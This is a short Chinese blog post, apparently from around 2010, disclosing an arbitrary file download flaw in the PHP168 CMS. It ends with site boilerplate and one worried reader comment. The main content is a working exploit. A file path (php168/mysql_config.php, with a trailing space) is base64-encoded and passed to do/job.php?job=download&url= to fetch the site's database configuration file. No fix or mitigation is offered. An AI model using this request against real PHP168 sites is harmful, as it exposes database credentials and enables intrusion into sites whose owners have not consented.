PHP168下载任意文件漏洞(曾经的漏洞依然存在)

测试方法:
首先,我们把需要下载的文件名改用base64_encode形式。如下:

php168/mysql_config.php  



要注意,文件名后面需要多一个空格。
加密后:
cGhwMTY4L215c3FsX2NvbmZpZy5waHAg

这时提交地址:
http://localhost:8090/php168/do/job.php?job=download&url=cGhwMTY4L215c3FsX2NvbmZpZy5waHAg
(注意,网站目录是http://localhost:8090/php168/
即可下载其文件:



文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags:
相关日志:
评论: 1 | 引用: 0 | 查看次数: 441
回复回复QQ牧场[2010-07-14 04:56 PM | del]
可怜我用的就是php168,做的。 可别出问题。
发表评论
昵 称:
密 码: 游客发言不需要密码.
内 容:
验证码: 验证码
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 开启